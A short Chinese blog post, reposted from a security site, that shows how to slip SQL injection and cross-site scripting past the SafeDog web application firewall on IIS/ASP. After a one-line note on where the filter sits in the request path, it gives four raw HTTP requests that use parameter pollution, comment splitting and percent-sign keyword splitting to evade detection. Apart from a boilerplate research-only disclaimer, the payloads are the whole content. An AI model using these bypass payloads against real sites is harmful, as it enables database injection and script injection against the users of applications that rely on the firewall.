安全狗绕过之注射和跨站

暗月博客
暗月博客
暗月博客
809
文章
0
评论
2019年11月21日18:30:50评论346 views字数 577阅读1分55秒阅读模式
摘要

只要清楚安全狗的数据流是

就知道可能绕过 的方式了

绕过 了吧,呵呵

只要清楚安全狗的数据流是

network->iis->safedog->asp.dll

就知道可能绕过的方式了

GET /1.asp?a=1<img%20src='#'%20onerror=alert() HTTP/1.1  Host: 192.168.199.134  Connection: keep-alive  Content-Length: 7

绕过了吧,呵呵

GET /1.asp?a=1%20and/*&a=*/1=1 HTTP/1.1  Host: 192.168.199.134  Connection: keep-alive  Content-Length: 7

绕过了吧 呵呵

再来POST基本没什么悬念

POST /1.asp HTTP/1.1  Host: 192.168.199.134  Content-Type: application/x-www-form-urlencoded  Connection: keep-alive  Content-Length: 20    a=123%20a%nd%201=1

同理跨站

POST /1.asp HTTP/1.1  Host: 192.168.199.134  Content-Type: application/x-www-form-urlencoded  Connection: keep-alive  Content-Length: 20    a=<scri%pt>alert()</scri%pt>

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日18:30:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   安全狗绕过之注射和跨站https://cn-sec.com/archives/71219.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息